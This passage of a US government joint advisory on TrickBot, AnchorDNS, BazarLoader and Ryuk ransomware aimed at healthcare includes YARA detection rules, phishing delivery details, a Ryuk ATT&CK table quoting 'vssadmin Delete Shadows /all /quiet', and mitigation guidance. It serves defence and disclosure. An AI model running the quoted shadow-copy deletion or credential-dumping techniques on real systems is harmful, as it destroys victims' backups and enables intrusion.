        hash2 = “056f326d9ab960ed02356b34a6dcd72d7180fc83″<br />
    strings:<br />
        $x86 = {75 1F 56 6A 40 B2 23 33 C9 5E 8A 81 ?? ?? ?? ?? 32 C2 FE C2 88 81 ?? ?? ?? ?? 41 83 EE 01 75 EA 5E B8 ?? ?? ?? ?? C3}<br />
        $x64 = {41 B0 23 41 B9 80 00 00 00 8A 84 3A ?? ?? ?? 00 41 32 C0 41 FE C0 88 04 32 48 FF C2 49 83 E9 01 75 E7}<br />
    condition:<br />
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_installer {<br />
    meta:<br />
        description = “Rule to detect AnchorDNS installer samples based off MZ magic under one-time pad or deobfuscation loop code”<br />
        author = “NCSC”<br />
        hash1 = “fa98074dc18ad7e2d357b5d168c00a91256d87d1″<br />
        hash2 = “78f0737d2b1e605aad62af252b246ef390521f02″<br />
    strings:<br />
        $pre = {43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00} //CONOUT$<br />
        $pst = {6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00} //kernel32.dll<br />
        $deob_x86 = {8B C8 89 4D F8 83 F9 FF 74 52 46 89 5D F4 88 5D FF 85 F6 74 34 8A 83 ?? ?? ?? ?? 32 83 ?? ?? ?? ?? 6A 00 88 45 FF 8D 45 F4 50 6A 01 8D 45 FF 50 51 FF 15 34 80 41 00 8B 4D F8 43 8B F0 81 FB 00 ?? ?? ?? 72 CC 85 F6 75 08}<br />
        $deob_x64 = {42 0F B6 84 3F ?? ?? ?? ?? 4C 8D 8C 24 80 00 00 00 42 32 84 3F ?? ?? ?? ?? 48 8D 54 24 78 41 B8 01 00 00 00 88 44 24 78 48 8B CE 48 89 6C 24 20 FF 15 ?? ?? ?? ?? 48 FF C7 8B D8 48 81 FF ?? ?? ?? ?? 72 B8}<br />
    condition:<br />
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)<br />
        and<br />
            (   uint16(@pre+16) ^ uint16(@pre+16+((@pst-(@pre+16))2)) == 0x5A4D<br />
                or<br />
                $deob_x86 or $deob_x64<br />
            )<br />
}</div>

<div class=”special_container”>import “pe”<br />
rule anchor_dns_string_1001_with_pe_section_dll_export_resolve_ip_domains {<br />
    meta:<br />
        description = “Rule to detect AnchorDNS samples based off /1001/ string in combination with DLL export name string, PE section .addr or IP resolution domains”<br />
        author = “NCSC”<br />
        hash1 = “ff8237252d53200c132dd742edc77a6c67565eee”<br />
        hash2 = “c8299aadf886da55cb47e5cbafe8c5a482b47fc8″<br />
    strings:<br />
        $str1001 = {2F 31 30 30 31 2F 00} // /1001/<br />
        $strCtrl = {2C 43 6F 6E 74 72 6F 6C 5F 52 75 6E 44 4C 4C 20 00} // ,Control_RunDLL<br />
        $ip1 = “checkip.amazonaws.com” ascii wide<br />
        $ip2 = “ipecho.net” ascii wide<br />
        $ip3 = “ipinfo.io” ascii wide<br />
        $ip4 = “api.ipify.org” ascii wide<br />
        $ip5 = “icanhazip.com” ascii wide<br />
        $ip6 = “myexternalip.com” ascii wide<br />
        $ip7 = “wtfismyip.com” ascii wide<br />
        $ip8 = “ip.anysrc.net” ascii wide<br />
    condition:<br />
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)<br />
        and $str1001<br />
        and (<br />
                for any i in (0..pe.number_of_sections): (<br />
                   pe.sections[i].name == “.addr”<br />
                )<br />
            or<br />
                $strCtrl<br />
            or<br />
                6 of ($ip*)<br />
            )<br />
}</div>

<div class=”special_container”>rule anchor_dns_check_random_string_in_dns_response {<br />
    meta:<br />
        description = “Rule to detect AnchorDNS samples based off checking random string in DNS response”<br />
        author = “NCSC”<br />
        hash1 = “056f326d9ab960ed02356b34a6dcd72d7180fc83″<br />
        hash2 = “14e9d68bba7a184863667c680a8d5a757149aa36″<br />
    strings:<br />
        $x86 = {8A D8 83 C4 10 84 DB 75 08 8B 7D BC E9 84 00 00 00 8B 7D BC 32 DB 8B C7 33 F6 0F 1F 00 85 C0 74 71 40 6A 2F 50 E8 ?? ?? ?? ?? 46 83 C4 08 83 FE 03 72 EA 85 C0 74 5B 83 7D D4 10 8D 4D C0 8B 75 D0 8D 50 01 0F 43 4D C0 83 EE 04 72 11 8B 02 3B 01 75 10 83 C2 04 83 C1 04 83 EE 04 73 EF 83 FE FC 74 2D 8A 02 3A 01 75 29 83 FE FD 74 22 8A 42 01 3A 41 01 75 1C 83 FE FE 74 15 8A 42 02 3A 41 02 75 0F 83 FE FF 74 08 8A 42 03 3A 41 03 75 02 B3 01 8B 75 B8}<br />
        $x64 = {4C 39 75 EF 74 56 48 8D 45 DF 48 83 7D F7 10 48 0F 43 45 DF 49 8B FE 48 85 C0 74 40 48 8D 48 01 BA 2F 00 00 00 E8 ?? ?? ?? ?? 49 03 FF 48 83 FF 03 72 E4 48 85 C0 74 24 48 8D 55 1F 48 83 7D 37 10 48 0F 43 55 1F 48 8D 48 01 4C 8B 45 2F E8 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DF 49 03 F7 48 8B 55 F7 48 83 FE 05 0F 82 6A FF FF FF}<br />
    condition:<br />
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_default_result_execute_command {<br />
    meta:<br />
        description = “Rule to detect AnchorDNS samples based off default result value and executing command”<br />
        author = “NCSC”<br />
        hash1 = “056f326d9ab960ed02356b34a6dcd72d7180fc83″<br />
        hash2 = “14e9d68bba7a184863667c680a8d5a757149aa36″<br />
    strings:<br />
        $x86 = {83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00}<br />
        $x64 = {48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8}<br />
    condition:<br />
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br />
}</div>

<div class=”special_container”>rule anchor_dns_pdbs {<br />
    meta:<br />
        description = “Rule to detect AnchorDNS samples based off partial PDB paths”<br />
        author = “NCSC”<br />
        hash1 = “f0e575475f33600aede6a1b9a5c14f671cb93b7b”<br />
        hash2 = “1304372bd4cdd877778621aea715f45face93d68″<br />
        hash3 = “e5dc7c8bfa285b61dda1618f0ade9c256be75d1a”<br />
        hash4 = “f96613ac6687f5dbbed13c727fa5d427e94d6128″<br />
        hash5 = “46750d34a3a11dd16727dc622d127717beda4fa2″<br />
    strings:<br />
        $ = “:\MyProjects\secondWork\Anchor\”        <br />
        $ = “:\simsim\anchorDNS”<br />
        $ = “:\[JOB]\Anchor\”<br />
        $ = “:\Anchor\Win32\Release\Anchor_”<br />
        $ = “:\Users\ProFi\Desktop\data\Win32\anchor”<br />
    condition:<br />
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br />
}</div>

<h4>BazarLoader/BazarBackdoor</h4>

<p>Beginning in approximately early 2020, actors believed to be associated with TrickBot began using BazarLoader and BazarBackdoor to infect victim networks. The loader and backdoor work closely together to achieve infection and communicate with the same C2 infrastructure. Campaigns using Bazar represent a new technique for cybercriminals to infect and monetize networks and have increasingly led to the deployment of ransomware, including Ryuk. BazarLoader has become one of the most commonly used vectors for ransomware deployment.</p>

<p>Deployment of the BazarLoader malware typically comes from phishing email and contains the following:</p>

<ul>
<li>Phishing emails are typically delivered by commercial mass email delivery services. Email received by a victim will contain a link to an actor-controlled Google Drive document or other free online filehosting solutions, typically purporting to be a PDF file.</li>
<li>This document usually references a failure to create a preview of the document and contains a link to a URL hosting a malware payload in the form of a misnamed or multiple extension file.</li>
<li>Emails can appear as routine, legitimate business correspondence about customer complaints, hiring decision, or other important tasks that require the attention of the recipient.  </li>
<li>Some email communications have included the recipient’s name or employer name in the subject line and/or email body.</li>
</ul>

<p>Through phishing emails linking users to Google Documents, actors used the below identified file names to install BazarLoader:</p>

<ul>
<li><code>Report-Review26-10.exe</code></li>
<li><code>Review_Report15-10.exe</code></li>
<li><code>Document_Print.exe</code></li>
<li><code>Report10-13.exe</code></li>
<li><code>Text_Report.exe</code></li>
</ul>

<p>Bazar activity can be identified by searching the system startup folders and Userinit values under the <code>HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon</code> registry key:</p>

<p><code>%APPDATA%MicrosoftWindowsStart MenuProgramsStartupadobe.lnk</code></p>

<p>For a comprehensive list of indicators of compromise regarding the BazarLocker and other malware, see <a href=”https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html”>https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html</a>.</p>

<h4>Indicators</h4>

<p>In addition to TrickBot and BazarLoader, threat actors are using malware, such as KEGTAP, BEERBOT, SINGLEMALT, and others as they continue to change tactics, techniques, and procedures in their highly dynamic campaign. The following C2 servers are known to be associated with this malicious activity.</p>

<h4>Ryuk Ransomware</h4>

<p>Typically Ryuk has been deployed as a payload from banking Trojans such as TrickBot. (See the <a href=”https://www.ncsc.gov.uk/news/ryuk-advisory”>United Kingdom (UK) National Cyber Security Centre (NCSC) advisory, Ryuk Ransomware Targeting Organisations Globally</a>, on their ongoing investigation into global Ryuk ransomware campaigns and associated Emotet and TrickBot malware.) Ryuk first appeared in August 2018 as a derivative of Hermes 2.1 ransomware, which first emerged in late 2017 and was available for sale on the open market as of August 2018. Ryuk still retains some aspects of the Hermes code. For example, all of the files encrypted by Ryuk contain the <code>HERMES </code>tag but, in some infections, the files have <code>.ryk</code> added to the filename, while others do not. In other parts of the ransomware code, Ryuk has removed or replaced features of Hermes, such as the restriction against targeting specific Eurasia-based systems.</p>

<p>While negotiating the victim network, Ryuk actors will commonly use commercial off-the-shelf products—such as Cobalt Strike and PowerShell Empire—in order to steal credentials. Both frameworks are very robust and are highly effective dual-purpose tools, allowing actors to dump clear text passwords or hash values from memory with the use of Mimikatz. This allows the actors to inject malicious dynamic-link library into memory with read, write, and execute permissions. In order to maintain persistence in the victim environment, Ryuk actors have been known to use scheduled tasks and service creation.</p>

<p>Ryuk actors will quickly map the network in order to enumerate the environment to understand the scope of the infection. In order to limit suspicious activity and possible detection, the actors choose to live off the land and, if possible, use native tools—such as net view, net computers, and ping—to locate mapped network shares, domain controllers, and active directory. In order to move laterally throughout the network, the group relies on native tools, such as PowerShell, Windows Management Instrumentation (WMI), Windows Remote Management , and Remote Desktop Protocol (RDP). The group also uses third-party tools, such as Bloodhound.</p>

<p>Once dropped, Ryuk uses AES-256 to encrypt files and an RSA public key to encrypt the AES key. The Ryuk dropper drops a <code>.bat</code> file that attempts to delete all backup files and Volume Shadow Copies (automatic backup snapshots made by Windows), preventing the victim from recovering encrypted files without the decryption program.</p>

<p>In addition, the attackers will attempt to shut down or uninstall security applications on the victim systems that might prevent the ransomware from executing. Normally this is done via a script, but if that fails, the attackers are capable of manually removing the applications that could stop the attack. The <code>RyukReadMe</code> file placed on the system after encryption provides either one or two email  addresses, using the end-to-end encrypted email provider Protonmail, through which the victim can contact the attacker(s). While earlier versions provide a ransom amount in the initial notifications, Ryuk users are now designating a ransom amount only after the victim makes contact.</p>

<p>The victim is told how much to pay to a specified Bitcoin wallet for the decryptor and is provided a sample decryption of two files.</p>

<p>Initial testing indicates that the <code>RyukReadMe</code> file does not need to be present for the decryption script to run successfully but other reporting advises some files will not decrypt properly without it. Even if run correctly, there is no guarantee the decryptor will be effective. This is further complicated because the <code>RyukReadMe</code> file is deleted when the script is finished. This may affect the decryption script unless it is saved and stored in a different location before running.</p>

<p>According to MITRE, <a href=”https://attack.mitre.org/versions/v7/software/S0446/”>Ryuk </a>uses the ATT&CK techniques listed in table 1.</p>

<p class=”text-align-center”><em>Table 1: Ryuk ATT&CK techniques</em></p>

<table border=”1″ cellpadding=”1″ cellspacing=”1″ class=”general-table” style=”width: 881.46px; height: 312px; margin-right: auto; margin-left: auto;”>
<thead>
<tr>
<th scope=”col” style=”width: 198px;”><strong>Technique</strong></th>
<th scope=”col” style=”width: 356px;”><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>System Network Configuration Discovery [<a href=”https://attack.mitre.org/versions/v7/techniques/T1016/”>T1016</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has called <code>GetIpNetTable</code> in attempt to identify all mounted drives and hosts that have Address Resolution Protocol entries. </td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>
<p>Masquerading: Match Legitimate Name or Location [<a href=”https://attack.mitre.org/versions/v7/techniques/T1036/005/”>T1036.005</a>]</p>
</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has constructed legitimate appearing installation folder paths by calling <code>GetWindowsDirectoryW</code> and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as <code>C:UsersPublic</code>. </td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Process Injection [<a href=”https://attack.mitre.org/versions/v7/techniques/T1055/”>T1055</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has injected itself into remote processes to encrypt files using a combination of <code>VirtualAlloc</code>, <code>WriteProcessMemory</code>, and <code>CreateRemoteThread</code>. </td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Process Discovery [<a href=”https://attack.mitre.org/versions/v7/techniques/T1057/”>T1057</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has called <code>CreateToolhelp32Snapshot</code> to enumerate all running processes. </td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Command and Scripting Interpreter: Windows Command Shell [<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/003/”>T1059.003</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used <code>cmd.exe</code> to create a Registry entry to establish persistence. </td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>File and Directory Discovery [<a href=”https://attack.mitre.org/versions/v7/techniques/T1083/”>T1083</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has called <code>GetLogicalDrives</code> to enumerate all mounted drives, and <code>GetDriveTypeW</code> to determine the drive type.</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Native API [<a href=”https://attack.mitre.org/versions/v7/techniques/T1106/”>T1106</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used multiple native APIs including <code>ShellExecuteW</code> to run executables; <code>GetWindowsDirectoryW</code> to create folders; and <code>VirtualAlloc</code>, <code>WriteProcessMemory</code>, and <code>CreateRemoteThread</code> for process injection. </td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Access Token Manipulation [<a href=”https://attack.mitre.org/versions/v7/techniques/T1134/”>T1134</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has attempted to adjust its token privileges to have the <code>SeDebugPrivilege</code>. </td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Data Encrypted for Impact [<a href=”https://attack.mitre.org/versions/v7/techniques/T1486/”>T1486</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used a combination of symmetric and asymmetric encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of <code>.RYK</code>. Encrypted directories have had a ransom note of <code>RyukReadMe.txt</code> written to the directory. </td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Service Stop [<a href=”https://attack.mitre.org/versions/v7/techniques/T1489/”>T1489</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has called <code>kill.bat</code> for stopping services, disabling services and killing processes. </td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Inhibit System Recovery [<a href=”https://attack.mitre.org/versions/v7/techniques/T1490/”>T1490</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used <code>vssadmin Delete Shadows /all /quiet</code> to delete volume shadow copies and <code>vssadmin resize shadowstorage</code> to force deletion of shadow copies created by third-party applications. </td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [<a href=”https://attack.mitre.org/versions/v7/techniques/T1547/001/”>T1047.001</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used the Windows command line to create a Registry entry under <code>HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun</code> to establish persistence.</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Impair Defenses: Disable or Modify Tools [<a href=”https://attack.mitre.org/versions/v7/techniques/T1562/001/”>T1562.001</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has stopped services related to anti-virus.</td>
</tr>
</tbody>
</table>
<h3>Mitigations</h3><p>For a downloadable copy of IOCs, see <a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A.stix.xml”>AA20-302A.stix</a>. For additional IOCs detailing this activity, see <a href=”https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456″>https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456</a>.</p>

<h4>Plans and Policies</h4>

<p>CISA, FBI, and HHS encourage HPH Sector organizations to maintain business continuity plans—the practice of executing essential functions through emergencies (e.g., cyberattacks)—to minimize service interruptions. Without planning, provision, and implementation of continuity principles, organizations may be unable to continue operations. Evaluating continuity and capability will help identify continuity gaps. Through identifying and addressing these gaps, organizations can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. CISA, FBI, and HHS suggest HPH Sector organizations review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by malicious cyber actors.</p>

<h4>Network Best Practices</h4>

<ul>
<li>Patch operating systems, software, and firmware as soon as manufacturers release updates.</li>
<li>Check configurations for every operating system version for HPH organization-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled.</li>
<li>Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.</li>
<li>Use multi-factor authentication where possible.</li>
<li>Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.</li>
<li>Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy.</li>
<li>Audit user accounts with administrative privileges and configure access controls with least privilege in mind.</li>
<li>Audit logs to ensure new accounts are legitimate.</li>
<li>Scan for open or listening ports and mediate those that are not needed.</li>
<li>Identify critical assets such as patient database servers, medical records, and teleheatlh and telework infrastructure; create backups of these systems and house the backups offline from the network.</li>
<li>Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.</li>
<li>Set antivirus and anti-malware solutions to automatically update; conduct regular scans.</li>
</ul>

<h4>Ransomware Best Practices</h4>

<p>CISA, FBI and HHS do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. In addition to implementing the above network best practices, the FBI, CISA and HHS also recommend the following:</p>

<ul>
<li>Regularly back up data, air gap, and password protect backup copies offline.</li>
<li>Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.</li>
</ul>

<h4>User Awareness Best Practices</h4>

<ul>
<li>Focus on awareness and training. Because end users are targeted, make employees and stakeholders aware of the threats—such as ransomware and phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.</li>
<li>Ensure that employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.</li>
</ul>

<h4>Recommended Mitigation Measures</h4>

<p>System administrators who have indicators of a TrickBot network compromise should immediately take steps to back up and secure sensitive or proprietary data. TrickBot infections may be indicators of an imminent ransomware attack; system administrators should take steps to secure network devices accordingly. Upon evidence of a TrickBot infection, review DNS logs and use the <code>XOR</code> key of <code>0xB9</code> to decode <code>XOR</code> encoded DNS requests to reveal the presence of <code>Anchor_DNS</code>, and maintain and provide relevant logs.</p>

<h3>GENERAL RANSOMWARE MITIGATIONS — HPH SECTOR</h3>

<p>This section is based on CISA and Multi-State Information Sharing and Analysis Center (MS-ISAC)’s Joint Ransomware Guide, which can be found at <a href=”https://www.cisa.gov/publication/ransomware-guide”>https://www.cisa.gov/publication/ransomware-guide</a>.</p>

<p>CISA, FBI, and HHS recommend that healthcare organizations implement both ransomware prevention and ransomware response measures immediately.</p>

<h4>Ransomware Prevention</h4>

<h4><em>Join and Engage with Cybersecurity Organizations</em></h4>

<p>CISA, FBI, and HHS recommend that healthcare organizations take the following initial steps:</p>

<ul>
<li>Join a healthcare information sharing organization, H-ISAC:
<ul>
<li>Health Information Sharing and Analysis Center (H-ISAC): <a href=”https://h-isac.org/membership-account/join-h-isac/”>https://h-isac.org/membership-account/join-h-isac/</a></li>
<li>Sector-based ISACs – National Council of ISACs: <a href=”https://www.nationalisacs.org/member-isacs”>https://www.nationalisacs.org/member-isacs</a></li>
<li>Information Sharing and Analysis Organization (ISAO) Standards Organization: <a href=”https://www.isao.org/information-sharing-groups/”>https://www.isao.org/information-sharing-groups/</a></li>
</ul>
</li>
<li>Engage with CISA and FBI, as well as HHS—through the HHS Health Sector Cybersecurity Coordination Center (HC3)—to build a lasting partnership and collaborate on information sharing, best practices, assessments, and exercises.
<ul>
<li>CISA: <a href=”https://us-cert.cisa.govcisa.gov”>cisa.gov</a>, <a href=”https://us-cert.cisa.gov/mailing-lists-and-feeds”>https://us-cert.cisa.gov/mailing-lists-and-feeds</a>, <a href=”https://us-cert.cisa.govcentral@cisa.gov”>central@cisa.gov</a>  </li>
<li>FBI: <a href=”https://us-cert.cisa.govic3.gov”>ic3.gov</a>, <a href=”https://us-cert.cisa.govwww.fbi.gov/contact-us/field”>www.fbi.gov/contact-us/field</a>, <a href=”https://us-cert.cisa.govwww.fbi.gov/contact-us/field”>CyWatch@fbi.gov</a></li>
<li>HHS/HC3: <a href=”http://www.hhs.gov/hc3″>http://www.hhs.gov/hc3</a>, <a href=”https://us-cert.cisa.govHC3@HHS.gov”>HC3@HHS.gov</a></li>
</ul>
</li>
</ul>

<p>Engaging with the H-ISAC, ISAO, CISA, FBI, and HHS/HC3 will enable your organization to receive critical information and access to services to better manage the risk posed by ransomware and other cyber threats.</p>

<h4><em>Follow Ransomware Best Practices</em></h4>

<p>Refer to the best practices and references below to help manage the risk posed by ransomware and support your organization’s coordinated and efficient response to a ransomware incident. Apply these practices to the greatest extent possible based on availability of organizational resources.</p>

<ul>
<li>It is critical to maintain offline, encrypted backups of data and to regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline or in separated networks as many ransomware variants attempt to find and delete any accessible backups. Maintaining offline, current backups is most critical because there is no need to pay a ransom for data that is readily accessible to your organization.
<ul>
<li>Use the 3-2-1 rule as a guideline for backup practices. The rule states that three copies of all critical data are retained on at least two different types of media and at least one of them is stored offline.</li>
<li>Maintain regularly updated “gold images” of critical systems in the event they need to be rebuilt. This entails maintaining image “templates” that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.</li>
<li>Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred.
<ul>
<li>Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.</li>
<li>Ensure all backup hardware is properly patched.</li>
</ul>
</li>
</ul>
</li>
<li>In addition to system images, applicable source code or executables should be available (stored with backups, escrowed, license agreement to obtain, etc.). It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.</li>
<li>Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response and notification procedures for a ransomware incident.
<ul>
<li>Review available incident response guidance, such as CISA’s Technical Approaches to Uncovering and Remediating Malicious Activity <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-245a”>https://us-cert.cisa.gov/ncas/alerts/aa20-245a</a>.</li>
</ul>
</li>
<li>Help your organization better organize around cyber incident response.</li>
<li>Develop a cyber incident response plan.</li>
<li>The Ransomware Response Checklist, available in the <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC Joint Ransomware Guide</a>, serves as an adaptable, ransomware- specific annex to organizational cyber incident response or disruption plans.</li>
<li>Review and implement as applicable MITRE’s Medical Device Cybersecurity: Regional Incident Preparedness and Response Playbook (<a href=”https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf”>https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf</a>).</li>
<li>Develop a risk management plan that maps critical health services and care to the necessary information systems; this will ensure that the incident response plan will contain the proper triage procedures.</li>
<li>Plan for the possibility of critical information systems being inaccessible for an extended period of time. This should include but not be limited to the following:
<ul>
<li>Print and properly store/protect hard copies of digital information that would be required for critical patient healthcare.</li>
<li>Plan for and periodically train staff to handle the re-routing of incoming/existing patients in an expedient manner if information systems were to abruptly and unexpectedly become unavailable.</li>
<li>Coordinate the potential for surge support with other healthcare facilities in the greater local area. This should include organizational leadership periodically meeting and collaborating with counterparts in the greater local area to create/update plans for their facilities to both abruptly send and receive a significant amount of critical patients for immediate care. This may include the opportunity to re-route healthcare employees (and possibly some equipment) to provide care along with additional patients.</li>
</ul>
</li>
<li>Consider the development of a second, air-gapped communications network that can provide a minimum standard of backup support for hospital operations if the primary network becomes unavailable if/when needed.</li>
<li>Predefine network segments, IT capabilities and other functionality that can either be quickly separated from the greater network or shut down entirely without impacting operations of the rest of the IT infrastructure.</li>
<li>Legacy devices should be identified and inventoried with highest priority and given special consideration during a ransomware event.</li>
<li>See <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC’s Joint Ransomware Guide</a> for infection vectors including internet-facing vulnerabilities and misconfigurations; phishing; precursor malware infection; and third parties and managed service providers.</li>
<li>HHS/HC3 tracks ransomware that is targeting the HPH Sector; this information can be found at <a href=”http://www.hhs.gov/hc3″>http://www.hhs.gov/hc3</a>.</li>
</ul>

<h4><em>Hardening Guidance</em></h4>

<ul>
<li>The Food and Drug Administration provides multiple guidance documents regarding the hardening of healthcare and specifically medical devices found here: <a href=”https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity”>https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity</a>.</li>
<li>See <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC’s Joint Ransomware Guide</a> for additional in-depth hardening guidance.</li>
</ul>

<h4><em>Contact CISA for These No-Cost Resources</em></h4>

<ul>
<li>Information sharing with CISA and MS-ISAC (for SLTT organizations) includes bi-directional sharing of best practices and network defense information regarding ransomware trends and variants as well as malware that is a precursor to ransomware.</li>
<li>Policy-oriented or technical assessments help organizations understand how they can improve their defenses to avoid ransomware infection: <a href=”https://www.cisa.gov/cyber-resource-hub”>https://www.cisa.gov/cyber-resource-hub</a>.
<ul>
<li>Assessments include Vulnerability Scanning and Phishing Campaign Assessment.</li>
</ul>
</li>
<li>Cyber exercises evaluate or help develop a cyber incident response plan in the context of a ransomware incident scenario.</li>
<li>CISA Cybersecurity Advisors (CSAs) advise on best practices and connect you with CISA resources to manage cyber risk.</li>
<li>Contacts:
<ul>
<li>SLTT organizations: <a href=”https://us-cert.cisa.govCyberLiaison_SLTT@cisa.dhs.gov”>CyberLiaison_SLTT@cisa.dhs.gov</a></li>
<li>Private sector organizations: <a href=”https://us-cert.cisa.govCyberLiaison_Industry@cisa.dhs.gov”>CyberLiaison_Industry@cisa.dhs.gov</a></li>
</ul>
</li>
</ul>

<h4><em>Ransomware Quick References</em></h4>

<ul>
<li><em>Ransomware: What It Is and What to Do About It </em>(CISA): General ransomware guidance for organizational leadership and more in-depth information for CISOs and technical staff: <a href=”https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_ Document-FINAL.pdf”>https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_ Document-FINAL.pdf</a></li>
<li>Ransomware (CISA): Introduction to ransomware, notable links to CISA products on protecting networks, specific ransomware threats, and other resources: <a href=”https://www.us-cert.cisa.gov/Ransomware”>https://www.us-cert.cisa.gov/Ransomware</a>  </li>
<li>HHS/HC3: Ransomware that impacts HPH is tracked by the HC3 and can be found at <a href=”https://us-cert.cisa.govwww.hhs.gov/hc3″>www.hhs.gov/hc3</a></li>
<li><em>Security Primer – Ransomware</em> (MS-ISAC): Outlines opportunistic and strategic ransomware campaigns, common infection vectors, and best practice recommendations: <a href=”https://www.cisecurity.org/white-papers/security-primer-ransomware/”>https://www.cisecurity.org/white-papers/security-primer-ransomware/</a></li>
<li><em>Ransomware: Facts, Threats, and Countermeasures </em>(MS- ISAC): Facts about ransomware, infection vectors, ransomware capabilities, and how to mitigate the risk of ransomware infection: <a href=”https://www.cisecurity.org/blog/ransomware- facts-threats-and-countermeasures/”>https://www.cisecurity.org/blog/ransomware- facts-threats-and-countermeasures/</a></li>
<li>HHS Ransomware Fact Sheet: <a href=”https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf”>https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf</a></li>
